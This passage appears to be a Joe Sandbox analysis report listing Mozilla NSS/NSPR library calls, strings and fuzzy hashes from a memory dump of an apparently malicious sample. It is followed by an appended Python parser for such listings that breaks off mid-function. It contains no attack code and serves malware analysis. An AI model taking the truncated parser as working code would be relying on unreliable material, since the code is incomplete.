                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • kbi., xrefs: 6C487886
                                                                                                                                                                                                                          • dll, xrefs: 6C48788E
                                                                                                                                                                                                                          • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C4874C7
                                                                                                                                                                                                                          • ,defaultModDB,internalKeySlot, xrefs: 6C48748D, 6C4874AA
                                                                                                                                                                                                                          • extern:, xrefs: 6C48772B
                                                                                                                                                                                                                          • rdb:, xrefs: 6C487744
                                                                                                                                                                                                                          • dbm:, xrefs: 6C487716
                                                                                                                                                                                                                          • NSS Internal Module, xrefs: 6C4874A2, 6C4874C6
                                                                                                                                                                                                                          • sql:, xrefs: 6C4876FE
                                                                                                                                                                                                                          • Spac, xrefs: 6C487389
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                                                                                                                                                          • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                                                                                                                                                          • API String ID: 3465160547-3797173233
                                                                                                                                                                                                                          • Opcode ID: c4c547b6c79fe121050a7cc6770649720d0bc5cf3f08a9c25f307871a960c193
                                                                                                                                                                                                                          • Instruction ID: a4bbd43e482a7678535af1245585c8077715f884b546495891264e56d4c2a694
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4c547b6c79fe121050a7cc6770649720d0bc5cf3f08a9c25f307871a960c193
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC52F0B1E063019BEF11DFA4CC19FAA7BB4AF06308F154028FD09A6B41E771E955CB96
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C4AC0C8
                                                                                                                                                                                                                            • Part of subcall function 6C539440: LeaveCriticalSection.KERNEL32 ref: 6C5395CD
                                                                                                                                                                                                                            • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539622
                                                                                                                                                                                                                            • Part of subcall function 6C539440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6C53964E
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C4AC0AE
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C5391AA
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539212
                                                                                                                                                                                                                            • Part of subcall function 6C539090: _PR_MD_WAIT_CV.NSS3 ref: 6C53926B
                                                                                                                                                                                                                            • Part of subcall function 6C460600: GetLastError.KERNEL32(?,?,?,?,?,6C4605E2), ref: 6C460642
                                                                                                                                                                                                                            • Part of subcall function 6C460600: TlsGetValue.KERNEL32(?,?,?,?,?,6C4605E2), ref: 6C46065D
                                                                                                                                                                                                                            • Part of subcall function 6C460600: GetLastError.KERNEL32 ref: 6C460678
                                                                                                                                                                                                                            • Part of subcall function 6C460600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C46068A
                                                                                                                                                                                                                            • Part of subcall function 6C460600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C460693
                                                                                                                                                                                                                            • Part of subcall function 6C460600: PR_SetErrorText.NSS3(00000000,?), ref: 6C46069D
                                                                                                                                                                                                                            • Part of subcall function 6C460600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,92AB236F,?,?,?,?,?,6C4605E2), ref: 6C4606CA
                                                                                                                                                                                                                            • Part of subcall function 6C460600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C4605E2), ref: 6C4606E6
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C4AC0F2
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C4AC10E
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C4AC081
                                                                                                                                                                                                                            • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C53945B
                                                                                                                                                                                                                            • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539479
  • Part of subcall function 6C539440: EnterCriticalSection.KERNEL32 ref: 6C539495
  • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C5394E4
  • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539532
  • Part of subcall function 6C539440: LeaveCriticalSection.KERNEL32 ref: 6C53955D
• PR_EnterMonitor.NSS3 ref: 6C4AC068
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
  • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
  • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
  • Part of subcall function 6C460600: GetProcAddress.KERNEL32(?,?), ref: 6C460623
• _NSSUTIL_UTF8ToWide.NSS3(?), ref: 6C4AC14F
• PR_LoadLibraryWithFlags.NSS3 ref: 6C4AC183
• free.MOZGLUE(00000000), ref: 6C4AC18E
• PR_LoadLibrary.NSS3(?), ref: 6C4AC1A3
• PR_EnterMonitor.NSS3 ref: 6C4AC1D4
• PR_ExitMonitor.NSS3 ref: 6C4AC1F3
• PR_CallOnce.NSS3(6C5D2318,6C4ACA70), ref: 6C4AC210
• PR_EnterMonitor.NSS3 ref: 6C4AC22B
• PR_ExitMonitor.NSS3 ref: 6C4AC247
• PR_EnterMonitor.NSS3 ref: 6C4AC26A
• PR_ExitMonitor.NSS3 ref: 6C4AC287
• PR_UnloadLibrary.NSS3(?), ref: 6C4AC2D0
• PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6C4AC392
• strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4AC3AB
• PR_NewLogModule.NSS3(nss_mod_log), ref: 6C4AC3D1
• PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6C4AC782
• PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6C4AC7B5
• PR_UnloadLibrary.NSS3(?), ref: 6C4AC7CC
• PR_SetError.NSS3(FFFFE097,00000000), ref: 6C4AC82E
• PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4AC8BF
• PORT_Alloc_Util.NSS3(?), ref: 6C4AC8D5
• free.MOZGLUE(00000000), ref: 6C4AC900
• PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4AC9C7
• memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4AC9E5
• free.MOZGLUE(00000000), ref: 6C4ACA5A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
• String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
• API String ID: 4243957313-3613044529
• Opcode ID: 8fa78149976e358769a2f98d835e85fdf530f8d3a693e7b9e834e0150774b093
• Instruction ID: 9914a5ae89b6dfb806de336287ea3d49d91c5d046dd2eecbc07a9fcee54b9f11
• Opcode Fuzzy Hash: 8fa78149976e358769a2f98d835e85fdf530f8d3a693e7b9e834e0150774b093
• Instruction Fuzzy Hash: A4429FB5A003059FDB40DF95CC46F5ABBB1FB65308F014028E8169BB29E732E956CF99
APIs
• malloc.MOZGLUE(00000008), ref: 6C583FD5
• strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C583FFE
• malloc.MOZGLUE(-00000003), ref: 6C584016
• strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6C5BFC62), ref: 6C58404A
• memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C58407E
• memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C5840A4
• memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C5840D7
• PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584112
• malloc.MOZGLUE(00000000), ref: 6C58411E
• __p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6C58414D
• PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584160
• free.MOZGLUE(?), ref: 6C58416C
• malloc.MOZGLUE(?), ref: 6C5841AB
• strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6C5841EF
• qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6C584520), ref: 6C584244
• GetEnvironmentStrings.KERNEL32 ref: 6C58424D
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C584263
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C584283
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5842B7
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5842E4
• malloc.MOZGLUE(00000002), ref: 6C5842FA
• FreeEnvironmentStringsA.KERNEL32(?), ref: 6C584342
• GetStdHandle.KERNEL32(000000F6), ref: 6C5843AB
• GetStdHandle.KERNEL32(000000F5), ref: 6C5843B2
• GetStdHandle.KERNEL32(000000F4), ref: 6C5843B9
• FreeEnvironmentStringsA.KERNEL32(?), ref: 6C584403
• PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584410
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6C58445E
• CloseHandle.KERNEL32(?), ref: 6C58446B
• free.MOZGLUE(?), ref: 6C584482
• free.MOZGLUE(00000000), ref: 6C584492
• free.MOZGLUE(00000000), ref: 6C5844A4
• GetLastError.KERNEL32 ref: 6C5844B2
• PR_SetError.NSS3(FFFFE896,00000000), ref: 6C5844BE
• free.MOZGLUE(?), ref: 6C5844C7
• free.MOZGLUE(00000000), ref: 6C5844D5
• free.MOZGLUE(00000000), ref: 6C5844EA
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
• String ID: =$D$NSPR_INHERIT_FDS=
• API String ID: 3116300875-3553733109
• Opcode ID: d54afce7b9175f5d62e1973f4a5a7d0c5437ff73d0036e5ee7f8493703f0f3d6
• Instruction ID: 28369047491135e8cceb796782b65f3bc8d5fcedb49f9f93db5ed179817a8278
• Opcode Fuzzy Hash: d54afce7b9175f5d62e1973f4a5a7d0c5437ff73d0036e5ee7f8493703f0f3d6
• Instruction Fuzzy Hash: 9B022770E063619FEB10CF69CC547AEBBB8AF16308F254128DC56ABB41D771E905CB91
APIs
• isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C4B601B,?,00000000,?), ref: 6C4D486F
• PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C4D48A8
• memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C4D48BE
• NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C4D48DE
• isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C4D48F5
• NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C4D490A
• PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C4D4919
• isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C4D493F
• isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4970
• PORT_Alloc_Util.NSS3(00000001), ref: 6C4D49A0
• strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C4D49AD
• isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D49D4
• NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C4D49F4
• NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C4D4A10
• NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C4D4A27
                                                                                                                                                                                                                          • NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C4D4A3D
                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C4D4A4F
                                                                                                                                                                                                                          • PL_strcasecmp.NSS3(00000000,every), ref: 6C4D4A6C
                                                                                                                                                                                                                          • PL_strcasecmp.NSS3(00000000,timeout), ref: 6C4D4A81
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D4AAB
                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C4D4ABE
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C4D4ADC
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D4B17
                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C4D4B33
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D413D
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4D4162
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D416B
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: PL_strncasecmp.NSS3(2BMl,?,00000001), ref: 6C4D4187
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: NSSUTIL_ArgSkipParameter.NSS3(2BMl), ref: 6C4D41A0
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D41B4
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C4D41CC
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: NSSUTIL_ArgFetchValue.NSS3(2BMl,?), ref: 6C4D4203
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C4D4B53
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D4B94
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4D4BA7
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D4BB7
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4BC8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
                                                                                                                                                                                                                          • String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
                                                                                                                                                                                                                          • API String ID: 3791087267-1256704202
                                                                                                                                                                                                                          • Opcode ID: 5e7dad37dc284b67b2e2beb91f38011d4a3aa333399e1b9fc20bc1c4a9b26d95
                                                                                                                                                                                                                          • Instruction ID: e7edef33c227cceac4331c04802834058f915c1b7ea3aa212db52f9d94d7a7a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7dad37dc284b67b2e2beb91f38011d4a3aa333399e1b9fc20bc1c4a9b26d95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4C12874E053558BEB00EFA59C60FAE7FB4AF06289F161069EC95A7B01E321B905C7A1
APIs
• memcpy.VCRUNTIME140(?,6C59A8EC,0000006C), ref: 6C496DC6
• memcpy.VCRUNTIME140(?,6C59A958,0000006C), ref: 6C496DDB
• memcpy.VCRUNTIME140(?,6C59A9C4,00000078), ref: 6C496DF1
• memcpy.VCRUNTIME140(?,6C59AA3C,0000006C), ref: 6C496E06
• memcpy.VCRUNTIME140(?,6C59AAA8,00000060), ref: 6C496E1C
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C496E38
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• PK11_DoesMechanism.NSS3(?,?), ref: 6C496E76
• TlsGetValue.KERNEL32 ref: 6C49726F
• EnterCriticalSection.KERNEL32(?), ref: 6C497283
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
• String ID: !
• API String ID: 3333340300-2657877971
• Opcode ID: 3b60902260934a85e676dfeb0023df1fbbeb5c93f781a70e9a5b22825df30d05
• Instruction ID: 4071b83a5d03b888a061cc4d1c4e767c199035fff28d2b3f510991885750af0d
• Opcode Fuzzy Hash: 3b60902260934a85e676dfeb0023df1fbbeb5c93f781a70e9a5b22825df30d05
• Instruction Fuzzy Hash: 7C726D75D052299FDF60DF28CC88F9ABBB5AF49304F1441A9D80DA7701EB31AA85CF91
APIs
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403C66
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C403D04
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403EAD
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403ED7
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403F74
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C404052
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C40406F
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C40410D
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C40449C
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: _byteswap_ulong$sqlite3_log
• String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
• API String ID: 2597148001-598938438
• Opcode ID: 4e22fd8518e754b649f4b143a3675a4a312cbb3ab5959f98efe6f6a3d6b54b82
• Instruction ID: 85ebc5645fe9e8d22e758b1a974933a6cf8439fb38406ab36c9365d042f9e2dc
• Opcode Fuzzy Hash: 4e22fd8518e754b649f4b143a3675a4a312cbb3ab5959f98efe6f6a3d6b54b82
• Instruction Fuzzy Hash: 7F829C75B40215CFCB04CF69C480F9ABBB2BF99358F2591A8D905ABB51E731EC42CB91
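The per-function API listings in these records (all from the module dumped at base 6C3F0000) are easier to triage as structured data than as bullet text. The following Python parser is an added example and is not part of the Joe Sandbox report or its tooling: it reads lines in the listing's own format, converts each call-site ref address to an RVA against the base taken from the Offset: field, counts call sites per imported module, and extracts the literal string arguments, which correspond to the strings summarised in each record's String ID line. The embedded sample text is a constructed excerpt assembled from lines of the records above; the regex assumes argument lists are comma-separated and that literal strings contain no commas, which holds for these records.

```python
"""Parse Joe Sandbox 'APIs' listings into structured call records.

Added example; not code from the report. It assumes the listing format seen in
the records above: a bullet, an optional 'Part of subcall function <addr>:'
prefix, <function>.<module>(<args>), and 'ref: <call-site address>'.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed excerpt: lines copied from the nss3 records in this report, with
# the 'Memory Dump Source' line supplying the module base via 'Offset:'.
SAMPLE_LISTING = """\
APIs
• PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C4D48A8
• memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C4D48BE
• NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C4D4A27
• PL_strcasecmp.NSS3(00000000,every), ref: 6C4D4A6C
• free.MOZGLUE(00000000), ref: 6C4D4AAB
  • Part of subcall function 6C4D4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D413D
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C40449C
• TlsGetValue.KERNEL32 ref: 6C49726F
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
"""

API_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[^.\s(]+)\.(?P<mod>[^\s(]+)"
    r"(?:\((?P<args>.*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
HEX32_RE = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass(frozen=True)
class ApiCall:
    func: str
    module: str
    args: Tuple[str, ...]        # raw argument tokens; '?' means unresolved
    ref: int                     # virtual address of the call site
    subcall_of: Optional[int]    # callee address when listed as a nested call


def parse_listing(text: str) -> Tuple[Optional[int], List[ApiCall]]:
    """Return (module base from the Offset: field, calls in listing order)."""
    base: Optional[int] = None
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            # Arguments are comma-separated; literal strings in these records
            # contain no commas, so a plain split is sufficient here.
            args = tuple(raw.split(",")) if raw is not None else ()
            sub = m.group("sub")
            calls.append(ApiCall(
                func=m.group("func"),
                module=m.group("mod"),
                args=args,
                ref=int(m.group("ref"), 16),
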